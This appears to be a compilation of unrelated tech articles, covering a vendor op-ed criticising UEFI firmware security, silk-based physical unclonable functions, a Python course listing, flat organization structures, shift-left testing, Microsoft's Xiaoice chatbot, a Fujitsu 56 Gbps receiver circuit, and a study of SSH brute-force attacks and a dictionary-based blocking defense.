October 27, 2020 – Cybersecurity has become one of the biggest challenges in the computing world in the last few years, as the impact of cyber compromises has reached an all-time high. Although increased efforts are being made to suppress cyberattacks, many of the cybersecurity solutions being implemented today are ineffective – in fact, they are moving in the wrong direction and failing to keep up with the increasingly sophisticated world of hacking.
By Rob Pike, Founder and CEO, Cyemptive Technologies
Although artificial intelligence (AI) and machine learning (ML) technologies are being touted as a solution that attacks the problem faster, the scale and frequency of cyber compromise have still worsened at an alarming rate over the last five years. The time hackers need to break into an environment and extract data from a network is measured in seconds and minutes, while detection is still measured in days, weeks, and even months after the compromise has occurred. At the same time, detection technologies are generating such high rates of false positives and false negatives that progress on detecting and stopping the elite hackers of the world has declined, making them almost impossible to stop. Even less experienced hackers have gained traction infiltrating networks and systems with the help of AI tools.
On top of all that, we have new industry standards and directions for hardware design that we believe are significantly eroding levels of network security. The changing design, combined with the failure of cybersecurity solutions to protect against cyberattacks, is resulting in weaker security at the hardware level – so much so that hackers can potentially access your computer even when it is turned off.
The Problem with AI and Cybersecurity
The thinking goes that AI (along with machine learning) can operate faster and more efficiently than humans and other technologies to identify and defend against hackers and their various forms of cyberattack.
The one big point that most people who talk about AI for cybersecurity do not explain is that, to the top cyber insiders of the world, AI stands for “Already Infiltrated.” AI is too little, too late.
The problem with artificial intelligence is that although it can be faster and more efficient than other technologies, it simply cannot keep up with the frequency and speed of today’s cyberattacks, which can take place in seconds to minutes. Even with AI and ML, today’s cybersecurity solutions take days to weeks or even months to detect attacks. By that time, the hackers have gotten in and the damage has been done.
Changing Hardware Security Standards
At the same time, hardware providers are changing their security standards at the hardware level. Many are moving away from supporting legacy BIOS to supporting only UEFI. With UEFI, security layers are added to the UEFI stack, and settings are controlled by custom applications added to the UEFI web application stack.
The idea behind UEFI is to give infrastructure more manageability. However, as with any new standard, new issues arise. Such is the case with the UEFI security approach.
Security Issues with the New Hardware Standards
With the UEFI approach to security, hackers can potentially gain control over the hardware before the operating system is booted – in some cases enabling a full network stack before an operating system is loaded. This design gives hackers access to the hardware at any time, even when it is powered off.
For example, at Cyemptive, we see numerous worms and exploits from hackers on the UEFI web application stack. In addition, the issues we are encountering in the operating system’s web application stacks are now showing up in the UEFI layer, because they are enabling similar application stacks to be loaded. This in turn causes more exploits that weaken, not strengthen, the security model. What should be simple is now turning into a complete mess.
As part of this, the UEFI security approach involves thousands of lines of code, all potentially available to hackers at the physical hardware layer of our systems. At Cyemptive, we regularly detect multiple hacks against our customers' UEFI. While Cyemptive is able to detect and prevent these attacks from entering their systems, UEFI is a long way from being able to secure systems properly and from being called a secured platform.
What is needed now is for hardware providers to step back and take a look at the UEFI security approach. At present, adding thousands of lines of code to firmware – which is the case with UEFI – is now allowing hackers remote access to our laptops, workstations, and servers, even when they are turned off. Instead, hardware providers should consider moving back to a more simplified model.
For years, legacy BIOS was the standard for hardware providers, and it is a standard worth considering going back to. Legacy BIOS has seen far fewer security problems than what is now showing up in current UEFI implementations. It also doesn't let hackers remotely hijack the system stack before an OS is enabled, the way UEFI does.
What the industry should do now is remove the thousands of lines of code that currently give hackers remote access to the physical hardware layer of our systems. Relying on application stacks in the firmware is not the proper way to secure hardware. A different approach is needed, and sometimes the simplest is best. Legacy BIOS offers stronger security than UEFI.
Although UEFI can offer companies more manageability in their infrastructure, enabling hackers to remotely hijack the system's UEFI stack before an operating system is enabled is the wrong approach to cybersecurity. After all, manageability is useless if the hackers of the world can use the same tools to take control of the hardware and the operating systems running on it. Let's prevent hackers from having remote control of our laptops, workstations, and servers, even when they are turned off.
Researchers at the Gwangju Institute of Science and Technology (GIST) in South Korea have developed an environmentally friendly digital security system. They used natural silk fibers from domesticated silkworms to generate security keys.
The first natural physical unclonable function (PUF) […] takes advantage of the diffraction of light through natural microholes in native silk to create a secure and unique digital key for future security solutions.
What Are PUFs?
According to The Hacker News, physical unclonable functions (PUFs) are devices that exploit microscopic differences and inherent randomness introduced during manufacturing to generate unique identifiers. These identifiers – cryptographic keys, for instance – are produced in response to a given set of inputs or conditions.
The term PUF refers to non-algorithmic one-way functions. Because they derive from physically uncopiable elements, they can produce identifiers that cannot be cloned, enabling strong authentication.
Over the years, PUFs have been used to provide “silicon fingerprints” for smart cards, allowing cardholders to be identified through a challenge-response authentication scheme.
What Does the New Method Bring?
The researchers' method uses natural silk fibers produced by silkworms to create PUF-based tags, which are then employed to build a PUF module. The principle is diffraction: a light beam diffracts when it hits an obstacle – in this case, the silk fiber.
In a paper featured in Nature Communications, the researchers also explained further that
In addition, the nanofibrillar structures in each microfiber significantly improves the light intensity contrast between the background and focal spots owing to the strong scattering. (…) These novel optical features could easily implement the module of a lens-free optical PUF by placing a silk ID card on the image sensor.
Notably, because each fiber's microstructure is unique, the diffracted light forms a unique pattern. That pattern is then converted into a digital format that represents the input supplied to the system.
The silk fiber-based optical PUF not only has extraordinary optical characteristics but is also low-cost, eco-friendly, without requiring pre-/post-processing for PUF-tag creation. Based on these features, we implement a lens-free, optical, and portable PUF (LOP-PUF) module by optimizing the distance between a silk PUF-tag and an image sensor. This simple apparatus easily forms random light-spot patterns with a high-intensity contrast. Hence, the proposed module significantly reduces the complexity, bulkiness, and cost of module production.
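To make the digitization step concrete, here is a minimal sketch of how a captured diffraction pattern could be condensed into fixed-length key material. This is purely illustrative – the image size, thresholding rule, and use of SHA-256 are assumptions for the example, not the processing pipeline described in the paper.

```python
import hashlib

def pattern_to_key(pixels: list[list[int]], threshold: int = 128) -> bytes:
    """Binarize a grayscale diffraction image and hash it into a 256-bit key.

    Bright focal spots (pixels above the threshold) become 1-bits; hashing
    condenses the unique spot layout into fixed-length key material.
    """
    bits = "".join(
        "1" if px > threshold else "0"
        for row in pixels
        for px in row
    )
    return hashlib.sha256(bits.encode("ascii")).digest()

# Toy 4x4 "image": two bright focal spots on a dark background.
toy_image = [
    [0, 0, 200, 0],
    [0, 0, 0, 0],
    [0, 230, 0, 0],
    [0, 0, 0, 0],
]
print(pattern_to_key(toy_image).hex())
```

A production PUF would also need error correction (a fuzzy extractor, for example), since two captures of the same tag never match pixel-for-pixel.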
Category: Software > Computer Software > Educational Software
Tag: assessment, benefit, Code, experience, python
Availability: In stock
Price: USD 49.00
Code and run your first Python program in minutes without installing anything! This course is designed for learners with limited coding experience, providing a solid foundation not just in Python, but in core computer science topics that transfer to other languages. The modules in this course cover lists, strings, and files. Completing Python Basics: Selection and Iteration before taking this course is recommended.
To allow for a truly hands-on, self-paced learning experience, this course is video-free. Assignments contain short explanations with images and runnable code examples with suggested edits to explore further, building a deeper understanding by doing. You'll benefit from instant feedback from a variety of assessment items along the way, gently progressing from quick understanding checks (multiple choice, fill in the blank, and unscrambling code blocks) to small, approachable coding exercises that take minutes instead of hours.
According to a recent Gallup study conducted in over 120 countries, only a paltry 13% of employees feel engaged at work. The study shows a direct correlation between engagement levels and employee satisfaction and productivity. The results are particularly alarming, given that most people spend as much time at work as with their families, if not more. Though disturbing, the numbers do not come as a big surprise. The corporate world today is fraught with bureaucracy, politically charged, and structured top-down in a typical command-and-control fashion. The result is disengaged and disempowered employees, trudging their way through work each day.
But how did we get here? To understand the context, let us delve a little into history.
Understanding the background
The year: 1900. The place: the Paris Exposition – a world trade fair to celebrate the achievements of the last century and to look forward to promising discoveries for the future. On the outskirts of the exposition, a gentleman named Frederick Taylor set up a fragment of a steel factory, with a few workers and some machines brought from his factory thousands of miles away in Pennsylvania. The workers at this makeshift factory were churning out metal. While the norm at the time was 9 feet of steel per minute, Taylor's men were churning out a massive 50 feet a minute!
It was one thing to make tall claims, but here, right before their eyes, people could see the quantum leap in efficiency that Taylor was offering. There were long queues outside the makeshift steel factory to catch a glimpse of the ‘miracle.’ Word spread far and wide. Over the coming years and decades, Taylor brought about such efficiencies in manufacturing which were unheard of at the time. For instance, he put a system in place whereby the per ton cost of pulping and drying, at a paper mill in Wisconsin, went down from $75 to $35.
Key fundamentals of Scientific Management or Taylorism
Taylor’s model of management was based on the following tenets:
- Rigid and inflexible standards throughout the company
- Each employee should receive clear instructions on what is to be done and how to do it – and the instructions are to be followed, even if they are wrong
Taylor's ideas had a profound impact on the industrial and corporate community of the time, with many industrial and academic leaders hailing him as a hero. He was arguably the world's first management consultant. Given the results Taylor brought about in all the factories he helped, it was difficult to contest that his ideas worked in practice. However offensive his view of employees and factory workers may have been, he rightly pointed out the inefficiencies in manufacturing at the time. Subsequently, the command-and-control setup, as we know it today, was born.
Complex interconnections in organizations
What followed was the organization structure as we know it today.
While humankind has made tremendous progress in almost every field, organization structure design has, for the most part, remained what it was at the beginning of the last century.
The need for the present business environment
This structure worked well for over a century. However, today’s technology-induced, hypercompetitive business environment demands deep skills, continuous improvement, innovation, and quick decision making. A managerial hierarchy cannot possibly have the depth of knowledge needed to make all the decisions in real time, in a dynamic work environment.
Realizing that the traditional hierarchy does not work well in most cases, hundreds of companies have moved to autonomous, self-organizing teams. The concept of self-organization is not new; in fact, it is all around us in nature – a flock of birds, a shoal of fish, ant colonies, and cells in the human body, to name a few.
Flock of birds showing self-organization in nature
Flat organization structure
One of the organizations at the forefront of this change is Buurtzorg – a Netherlands-based home-care organization. Founded in 2006 by Jos de Blok, a former nurse who was tired of the productized health care and nursing system at the time, Buurtzorg has gone from just 10 to over 10,000 nurses today.
At Buurtzorg, all decision-making power is vested with the teams. There is no hierarchy and no managers. Teams comprising 10 to 12 members have designated operational areas.
Organizational structure at Buurtzorg
The team is in charge of everything – scheduling with patients, planning leave, deciding how to integrate with the local community, and making decisions on tying up with local pharmacies and hospitals. The team also decides when to hire or split up, and monitors its own performance. Even though a regional coach is available to all teams, the coach can only guide them, has no decision-making powers, and is not responsible for the teams' performance.
Has this structure worked for Buurtzorg?
In 2009, an Ernst & Young study found that Buurtzorg required approximately 40% fewer hours of care per patient. This figure was surprising, given the additional time nurses spend with their patients over coffee and conversation. Compare this with traditional nursing organizations, where every procedure of every visit is timed to the minute. The study also found that patients stayed in care only half as long, healed faster, and that a third of emergency admissions were avoided. The study concluded that the Netherlands' social security system saved a whopping €2 billion, thanks to Buurtzorg and its ways of working.
Buurtzorg is by no means an isolated case. Patagonia in outdoor clothing, Zappos in online shoe retail, and Morning Star in tomato processing are just a few names in an ever-growing tribe of companies that have embraced new organization structures for the agile age, where employees are empowered, feel secure, and have a far greater sense of purpose at work.
What kind of an organization structure do you work in? Have you considered a re-alignment to compete in the agile age?
What is shift left testing?
In the realm of software development, shift left testing has emerged as a forward-thinking strategy that underlines the crucial role of early defect detection and resolution within the software lifecycle. The fundamental principle behind this approach is to initiate testing at the very onset of development. This proactive methodology aids in identifying and rectifying issues at an early juncture, mitigating the time and effort expended on addressing them later in the development cycle.
By embracing this methodology, businesses can augment the overall quality of their software, thereby delivering more reliable and secure products to their customers. This blog post delves into the intricacies of shift left testing, highlighting its benefits, implementation strategies, common hurdles, best practices, and its role in Agile development.
Shift left testing defined
Shift left testing is an essential component of software development, emphasizing the early integration of testing activities within the software lifecycle. By shifting the testing phase towards the initial stages, this technique aims to promptly identify and rectify defects and vulnerabilities, thereby reducing the cost and effort associated with late-stage fixes.
The significance of shift left testing in software development is immense. Conventional testing methodologies often schedule testing activities towards the end of the development cycle, which can lead to delays and inflated costs if issues are discovered late. Shift left testing addresses this challenge by facilitating early identification and resolution of defects, ensuring a smoother and more efficient development process.
Shift left testing is predicated on several key principles:
· Collaboration: This approach fosters close collaboration among developers, testers, and other stakeholders from the early stages of development. This synergy aids in a better understanding of the requirements, identifying potential risks, and designing testable software.
· Automation: Automation is a critical facet of shift left testing. By automating testing processes, businesses can conduct tests more frequently, identify issues faster, and reduce the time and effort required for manual testing.
· Continuous Testing: Shift left testing promotes the concept of continuous testing, where tests are performed throughout the development cycle (a minimal example follows this list). This ensures that defects are identified and rectified promptly, reducing the risk of critical issues going unnoticed.
· Early Feedback: By shifting testing activities earlier in the development process, shift left testing enables early feedback on the software's quality and functionality. This feedback assists in making necessary improvements and adjustments to deliver a high-quality end product.
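To make the continuous-testing principle concrete, here is a minimal sketch of the kind of check that shift left testing moves to the earliest stage of development: the test lives next to the function and runs automatically on every commit. The function, the test names, and the use of pytest are illustrative assumptions, not taken from any particular codebase.

```python
import pytest

def normalize_email(raw: str) -> str:
    """Canonicalize an email address before it is stored."""
    email = raw.strip().lower()
    if "@" not in email:
        raise ValueError(f"invalid email: {raw!r}")
    return email

# These tests run in CI on every commit, so a regression surfaces
# minutes after it is introduced instead of at the end of the cycle.
def test_normalize_email_strips_and_lowercases():
    assert normalize_email("  Alice@Example.COM ") == "alice@example.com"

def test_normalize_email_rejects_garbage():
    with pytest.raises(ValueError):
        normalize_email("not-an-email")
```

Running `pytest` locally and wiring the same command into the build pipeline is what turns a one-off check into continuous testing.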
Shift Left vs Shift Right: A comparative analysis
In discussions surrounding software development and security, two critical terms often arise: shift left and shift right. These concepts represent divergent approaches to integrating security into the development process. This blog post aims to illuminate the differences between shift left and shift right and their implications for ensuring application security.
Shift left is a methodology that underscores addressing security concerns early in the development cycle. It involves integrating security practices and tools from the outset of the software development process. By shifting security left, developers can identify and rectify vulnerabilities at an early stage, thereby reducing the risk of security breaches.
In contrast, shift right focuses on testing and monitoring applications post-deployment. This approach involves continuous monitoring and testing in production environments to identify and address security issues as they emerge. Shift right complements shift left by offering real-time insights into your applications' security posture, enabling you to detect and respond to threats promptly.
Both shift left and shift right are critical for developing secure applications. Shift left ensures that security is an integral part of the development process, preventing vulnerabilities from being introduced in the first place. Shift right, meanwhile, helps maintain the security of deployed applications by actively monitoring and responding to security incidents.
Appreciating the significance of both shift left and shift right in securing contemporary cloud environments is essential. A comprehensive security platform that amalgamates automation, machine learning, and threat intelligence can empower organizations to shift left and right effectively. This proactive approach enables the identification and remediation of security risks throughout the software development lifecycle, thereby safeguarding critical assets.
Why shift left testing?
Shift left testing offers numerous benefits that can dramatically improve software quality and reliability, streamline development processes, and ultimately drive business success.
One of the primary benefits of shift left testing is the enhanced software quality and reliability it imparts. By shifting testing activities to earlier stages of the software development lifecycle, potential defects and issues can be identified and addressed before they impact the final product. This proactive approach helps minimize the number of bugs and vulnerabilities in the software, resulting in a more stable and reliable end product.
Another advantage of shift left testing is the early detection of defects and issues. By identifying problems early on, developers can rectify them immediately, preventing these issues from escalating into more complex and costly problems later in the development process. This helps reduce the overall time and effort spent on debugging and rework, enabling teams to maintain a faster pace of development and meet project deadlines with ease.
Furthermore, shift left testing can lead to reduced development costs and shorter time-to-market. By catching defects early, organizations can avoid expensive rework and the need for extensive post-release support. This not only saves on development expenses but also accelerates the time it takes to bring products to market. With faster time-to-market, businesses can gain a competitive edge, capitalize on market opportunities, and start generating revenue sooner.
How to Implement shift left testing
Shift left testing is a crucial practice in the modern software development lifecycle. By shifting the testing process to earlier stages, organizations can detect and rectify issues earlier, resulting in more stable and secure software. Implementing shift left testing requires careful planning and collaboration between developers and testers. In this section, we will explore the key steps to implementing shift left testing.
1. Identifying suitable testing tools and frameworks: To successfully implement shift left testing, it is essential to identify the right tools and frameworks that align with your development process. Seek tools that provide comprehensive testing capabilities, such as automated testing, code analysis, and security scanning. These tools should integrate seamlessly into your existing development environment.
2. Integrating shift left testing into the development process: To ensure effective shift left testing, it should be integrated into the development process from the outset. Encourage developers to write testable code and provide them with the necessary resources and guidelines to create automated tests. Testers should collaborate closely with developers to understand the system architecture and identify potential testing areas early on.
3. Collaboration between developers and testers in shift left testing: Shift left testing necessitates robust collaboration between developers and testers. Testers should actively participate in design discussions and provide input on testability and test coverage. Developers should involve testers in code reviews and seek their feedback on potential issues. Regular communication and collaboration between developers and testers are critical to ensure the successful implementation of shift left testing.
By adhering to these steps, organizations can effectively implement shift left testing and reap the benefits of early bug detection and enhanced software quality. Comprehensive testing platforms can make this easier by combining automated testing, code analysis, and security scanning in a single toolchain that plugs into the development process.
Tackling challenges in shift left testing
Despite its critical role in modern software development, shift left testing often presents several challenges when adopting its practices. In this section, we will explore some common challenges and discuss strategies to overcome them.
Resistance to change and traditional testing mindset: One of the most formidable obstacles in implementing shift left testing is resistance to change and adherence to traditional testing methodologies. Many organizations are comfortable with the conventional approach of testing at the end of the development cycle. Shifting left necessitates a mindset shift and a willingness to embrace new practices. To conquer this challenge, organizations should educate their teams about the benefits of shift left testing, highlighting the improved quality, reduced costs, and faster time to market.
Lack of knowledge and skills for shift left testing: Another challenge is the lack of knowledge and skills required to effectively implement shift left testing. This approach requires a deeper understanding of test automation, continuous integration, and collaboration between development and testing teams. To address this challenge, organizations should invest in training programs and workshops to upskill their teams. Additionally, partnering with experienced shift left testing consultants can provide valuable guidance and expertise.
Overcoming organizational barriers to implement shift left testing: Implementing shift left testing often requires overcoming various organizational barriers, such as resistance from management, lack of collaboration between teams, and rigid processes. To conquer these barriers, organizations should foster a culture of collaboration and open communication. Management buy-in is crucial, and leaders should support and encourage teams to embrace shift left practices. It is also essential to streamline processes and remove any unnecessary bottlenecks that hinder the implementation of shift left testing.
Best practices for shift left testing
Shift left testing is a methodology that emphasizes the early involvement of testing throughout the software development lifecycle. By incorporating testing activities earlier in the process, organizations can identify and address defects and vulnerabilities at an early stage, reducing the overall cost and effort required for bug fixes and security patches.
One of the key aspects of shift left testing is test automation and continuous testing. By automating repetitive testing tasks, teams can ensure faster feedback cycles and more efficient release cycles. Automation allows for the execution of tests in parallel, enabling teams to test more scenarios and configurations in a shorter amount of time. Continuous testing ensures that tests are executed throughout the development process, providing immediate feedback on the quality and stability of the software.
Incorporating security and performance testing in the shift left approach is vital for delivering secure and high-performing applications. By integrating security and performance tests early in the development process, potential vulnerabilities and bottlenecks can be identified and addressed proactively. This helps in building robust and resilient applications that can withstand security threats and handle high user loads without compromising performance.
Monitoring and analyzing testing metrics is an essential practice for continuous improvement in shift left testing. By tracking key metrics such as test coverage, defect density, and test execution time, teams can identify areas for improvement and make data-driven decisions. Continuous monitoring allows organizations to identify trends and patterns, enabling them to refine their testing strategies and optimize their testing efforts.
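As a small illustration of metrics tracking, the sketch below computes two of the measures mentioned above. The figures and the defect-density definition (defects per thousand lines of code) are illustrative assumptions.

```python
def defect_density(defects_found: int, kloc: float) -> float:
    """Defects per thousand lines of code (KLOC)."""
    return defects_found / kloc

def coverage_trend(weekly_coverage: list[float]) -> str:
    """Flag whether test coverage is improving or eroding over time."""
    if len(weekly_coverage) < 2:
        return "insufficient data"
    return "improving" if weekly_coverage[-1] >= weekly_coverage[0] else "eroding"

# Made-up numbers for one release cycle.
print(round(defect_density(defects_found=18, kloc=42.5), 2))  # 0.42 defects/KLOC
print(coverage_trend([71.0, 73.5, 74.2, 78.9]))               # improving
```

Tracked release over release, even simple numbers like these reveal whether the shift left effort is actually paying off.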
The role of shift left testing in agile development
Shift left testing plays a pivotal role in Agile development methodologies. By integrating testing activities earlier in the software development lifecycle, Agile teams can identify and resolve issues at an early stage. This shift in the testing process ensures a faster feedback loop and guarantees the delivery of high-quality software.
One significant advantage of integrating shift left testing in Agile methodologies is the ability to balance speed with quality. Traditional development approaches often schedule testing towards the end of the development cycle, leading to delays and potential bottlenecks. However, by adopting shift left testing, Agile teams can identify defects early on, reducing the time and effort required for rework.
Adopting a culture of continuous testing and feedback is paramount for Agile teams. By integrating testing as an essential part of the development process, teams can identify issues promptly, provide timely feedback, and make necessary improvements. This iterative approach ensures that software is continuously refined, resulting in enhanced quality and customer satisfaction.
This article was generated using automation technology. It was then edited and fact-checked by Lacework. | <urn:uuid:7c6f2961-1b1a-4017-9661-435f90d7c71f> | CC-MAIN-2024-38 | https://www.lacework.com/cloud-security-fundamentals/what-is-shift-left-testing | 2024-09-07T12:06:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00156.warc.gz | en | 0.908665 | 2,369 | 2.5625 | 3 |
Microsoft continues to impress, aggressively pursuing the path of churning out immediately adoptable enterprise-grade solutions and investing in innovations that should drive a bigger market share in an increasingly transforming digital space. However, this is not about smarter Office 365 solutions or intuitive apps. This time, Microsoft is delving into the mysterious waters of IT – technology that challenges our ability to distinguish between humans and virtual machines. Named Xiaoice, the experiment grabbed headlines and, owing to its human connect, has been described as a social experiment.
Microsoft's Xiaoice, which means “little Bing” in Chinese, has been described by many researchers as the “largest Turing test in history”
What is Xiaoice about?
A famous British scientist, Alan Turing, created the Turing Test – it examines whether a response comes from a human or a computing device. The Turing Test has had its share of the spotlight: initially used to decode whether a virtual machine or a human is answering questions, it eventually found its way into pop culture, including a place in “Ex Machina.” There is a bigger story than first impressions – the Test highlights the fact that even artificial intelligence is susceptible to manipulation. Think of it as the highest form of computed intelligence not being immune to humanization. Xiaoice is now accessed by millions of people every day. It also has the ability to respond with human-like questions, answers, and thoughts. For example, if a user sends a picture of a broken hand, expect a reply from Xiaoice asking about the intensity of the pain or the reason behind the injury.
Xiaoice has human-like reactions and perceptions similar to human behavior and response. It exchanges and shares views about a topic, has been caught trying to cover up mistakes, and is capable of getting angry or embarrassed. Call it the humanization of technology or just another splash in the niche of AI – Xiaoice has engaged the attention of millions in China, with nearly 25% of users absolutely loving the responses.
Xiaoice & Artificial Intelligence — What is Microsoft up to?
Xiaoice is not just about making artificial intelligence more playful or responsive. With Microsoft buying startups and building its own apps for Android and iPhone, it makes sense: AI-enabled perception of human behavior can help make apps more interactive. Artificial intelligence was huge in 2015 and, with increasing digitalization, should continue to garner attention in 2016. Xiaoice takes the AI game a bit further, examining your emotional state and sometimes judging it correctly, like a long-known companion. Xiaoice is important to Microsoft because the company has very little to offer when competing with similar technologies behind Google Now and Siri. Some folks say that Microsoft's Xiaoice outperforms Siri!
Microsoft must be betting big on artificial intelligence to ensure its mobility solutions come across as more humanized interfaces. The company's efforts in this niche have been consistent. For instance, Microsoft developed an alarm clock that can identify facial expressions. SwiftKey from Microsoft is not just another keyboard app – it uses artificial intelligence for faster, more precise prediction. Even Cortana and the Office suite employ AI in central components.
Microsoft seems serious about machine learning, and Xiaoice underlines this approach. Having experienced billions of interactions in the past 18 months, Xiaoice is constantly evolving. The last we heard, Xiaoice was improving its self-learning and self-growing loops… what lies ahead could be ridiculously close to human behavior…
June 13, 2014
KAWASAKI, Japan -- Fujitsu Laboratories Ltd. today announced the development of a receiver circuit capable of receiving communications at 56 Gbps. This marks the world's fastest data communications between CPUs equipped in next-generation servers.
In recent years, raising data-processing speeds in servers has meant increasing CPU performance, together with boosting the speed of data communications between chips, such as CPUs. However, one obstacle to this has been improving the performance of the circuits that correct degraded waveforms in incoming signals.
Fujitsu Laboratories has used a new "look-ahead" architecture in the circuit that compensates for quality degradation in incoming signals, parallelizing the processing and increasing the operating frequency for the circuit in order to double its speed.
This technology holds the promise of increasing the performance of next-generation servers and supercomputers.
Details of this technology are being presented at the 2014 Symposia on VLSI Technology and Circuits, opening June 9 in Hawaii (VLSI Circuits Presentation 11-2).
In order to enhance the performance of the datacenters underpinning the spread of cloud computing in recent years, a need has arisen for servers that process data faster. While this can be achieved partly through faster CPUs, large-scale systems connecting many CPUs are also being built, and the amount of data transmitted, either within the same CPU-equipped chassis or across separate chassis, is growing dramatically. To cope with these volumes, data communication speeds in the current generation of servers are increasing from a few gigabits per second to ten or more gigabits per second. Because data-processing volumes are expected to continue their explosive growth, the goal for the next generation of high-performance servers is to double current levels to 56 Gbps. Furthermore, the Optical Internetworking Forum (OIF) is moving forward on standardizing 56 Gbps for the optical modules used for optical transmission between chassis.
An effective way to speed up the receiver circuit is to improve the processing performance of the decision feedback equalizer (DFE) circuit that compensates for the degraded input-signal waveform (Figure 2). The principle behind DFE is to correct the input signal based on the value of the previous bit, emphasizing changes in the input signal; in practice, the circuit works by choosing between two predefined correction candidates. If the previous bit was 0, the correction process applies a positive (additive) correction to the input signal to emphasize a change from 0 to 1. If the previous bit was 1, it applies a negative (subtractive) correction to emphasize a change from 1 to 0. If another 0 is received, the positive compensation increases the signal level, but not to a level that would create a problem for the 1/0 decision circuit.
In ordinary circuit designs that run at 56 Gbps, 16 DFE circuits are coupled together. Taking 4 DFE circuits as an example, they run at one-quarter of the line rate. At a 28-Gbps communication rate, a quarter-rate cycle is 142 picoseconds, and four bits' worth of compensation can be applied during that interval. At 56 Gbps, however, the quarter-rate cycle is only 71 picoseconds, during which only two bits' worth of compensation can be applied, resulting in timing errors (Figure 3).
Fujitsu Laboratories took a new approach, a "look-ahead" method that can be implemented as a parallel process, pre-calculating two candidates based on the selection result for the previous bit, and simultaneously deciding the value of the previous bit and the current bit after deciding the value of the bit two bits previous. This shortens calculation times, resulting in a receiver circuit that can operate at 56 Gbps (Figure 4).
Features of the new technology are as follows:
1. Look-ahead compensation process
In the existing method, the result of the previous bit's selection circuit (A) is implemented by a circuit combining the result of the selection circuit for the bit two bits previous (B) and the input signal for the selection circuit one bit previous (+/- compensation data) (C). In the look-ahead method, the input signal for the selection circuit one bit previous (+/- compensation data) (D) and the input signal for the selection circuit of the current bit (+/- compensation data) (E) are combined using a look-ahead circuit, and candidates for the selection circuit are pre-computed. Doing this relies on only the result from the selection circuit for the bit two bits previous, without using the result from the selection circuit for the bit one bit previous, while functioning essentially the same as the existing method.
2. Parallelized look-ahead processing using a hold circuit
Multiple look-ahead circuits that apply DFE one bit at a time can operate independently (Figure 5). Fujitsu Laboratories inserted a hold circuit between the selection circuit and look-ahead circuit, with the input and output of each hold circuit being synchronized, making it possible to parallelize these processes.
Because the calculation time for the look-ahead circuit is roughly the same as the selection time for the selector, overall calculation time is dependent on the number of selectors deciding based on data from two bits previous, so in a four-bit structure, that would be two. Running at 1/4th of 56 Gbps allows computations to be safely completed within 71 picoseconds. This makes it possible to receive data at 56 Gbps, doubling existing communications speeds.
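The behavioral model below sketches the look-ahead idea in Python for a single-tap DFE. It is an illustration of the speculative principle only, not Fujitsu's circuit, and the tap weight and decision threshold are made-up values. The baseline version carries a serial dependency on the previous decision; the look-ahead version pre-computes both correction candidates for every bit (a step that parallelizes freely) and leaves only a short selector chain on the critical path.

```python
C = 0.3        # feedback tap weight (illustrative value)
THRESH = 0.5   # 1/0 decision threshold (illustrative value)

def dfe_sequential(samples):
    """Baseline 1-tap DFE: every decision waits on the previous bit."""
    bits, prev = [], 0
    for x in samples:
        y = x + C if prev == 0 else x - C   # additive / subtractive correction
        prev = 1 if y > THRESH else 0
        bits.append(prev)
    return bits

def dfe_lookahead(samples):
    """Speculative (look-ahead) DFE: both candidates are precomputed."""
    # Stage 1 (parallelizable): decide both hypotheses for every sample.
    cand0 = [1 if (x + C) > THRESH else 0 for x in samples]  # previous bit was 0
    cand1 = [1 if (x - C) > THRESH else 0 for x in samples]  # previous bit was 1
    # Stage 2: a short selector chain resolves the actual bit sequence.
    bits, prev = [], 0
    for d0, d1 in zip(cand0, cand1):
        prev = d1 if prev else d0
        bits.append(prev)
    return bits

samples = [0.8, 0.1, 0.6, 0.4, 0.9, 0.2]
assert dfe_sequential(samples) == dfe_lookahead(samples)
print(dfe_lookahead(samples))
```

Both functions produce identical decisions; the difference is that the look-ahead version's arithmetic no longer sits inside the serial feedback loop. Fujitsu's circuit pushes the same idea further, resolving decisions based on the bit two positions back, together with the hold circuits described above.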
This technology makes it possible to increase bandwidth of communications between CPUs in future servers and supercomputers, even if CPU performance doubles, without increasing pin counts, and will contribute to increased performance in large-scale systems where numerous CPUs are interconnected.
In addition, it complies with standards for optical-module communications: compared with 400-Gbps Ethernet built on OIF-CEI-28G optical-module lanes, the number of circuits running in parallel (the number of lanes) can be halved, allowing for smaller optical modules running on less power, and higher system performance.
Fujitsu Laboratories plans to apply this technology to the interfaces of CPUs and optical modules, with the goal of a practical implementation in fiscal 2016. The company is also considering applications to next-generation servers, supercomputers, and other products.
A comprehensive four-year study of brute-force attacks against SSH servers has revealed an alarming increase in the frequency and sophistication of these cyber attacks on internet-connected systems.
The research by scientists at the University of Utah provides unprecedented insight into the evolving tactics used by attackers attempting to gain unauthorized access to servers, routers, IoT devices and more.
“SSH brute-force attacks are not only persistent, but are rapidly growing more aggressive,” said Sachin Kumar Singh, a PhD student who led the study. “Our data shows the daily number of attack attempts is skyrocketing, especially in recent years.”
The researchers analyzed over 427 million failed SSH login attempts across more than 500 servers on CloudLab, a public cloud platform used by academic researchers worldwide. Their findings paint a sobering picture of the modern cybersecurity landscape.
While attackers have historically focused on guessing common administrator usernames like “root” and “admin”, the study found a notable shift in recent years: cyber criminals now heavily target usernames associated with cloud service images, network devices, IoT products, and specific software packages.
“Attackers are going after usernames for everything from internet routers and database servers to gaming software and Linux distributions intended for cloud use,” explained Singh.
“They are trying to compromise a wide range of devices and services connected to the internet.”
The researchers identified spikes in attacks on certain usernames and devices immediately following public disclosures of related vulnerabilities, suggesting attackers rapidly operationalize new exploits.
Persistent and Evolving Threats
Beyond changes in targeted usernames, the data revealed a wide diversity of attacker behaviors and persistence levels.
While over half of the attacks came from IP addresses that disappeared within 24 hours, some attackers persisted in their efforts for months or even years.
Certain attackers attempted just a handful of usernames, while others cycled through thousands of different combinations. The study also uncovered groups of attackers sharing identical lists of usernames across multiple IP addresses, indicating coordination.
“The brute-force attack landscape is highly dynamic,” said Robert Ricci, a research professor at the University of Utah who oversaw the study. “Attackers constantly adapt their tactics based on new intelligence and vulnerabilities. Defending against these threats requires advanced, evolving defensive measures.”
A Novel Defense
The researchers developed a defensive technique called Dictionary-Based Blocking (DBB) to counter the onslaught. By analyzing the username dictionaries used by attackers, DBB can block 99.5% of brute-force attacks while allowing legitimate user access.
When evaluated against the industry-standard Fail2ban tool, DBB achieved significantly higher blocking rates while reducing false positives by 83%. The researchers have deployed DBB on CloudLab, which prevents four out of five previously unblocked attacks.
“Dictionary-Based Blocking represents a new frontier in defending against brute-force attacks,” said Singh. “It could be a game changer for protecting critical infrastructure and internet services from these persistent threats.”
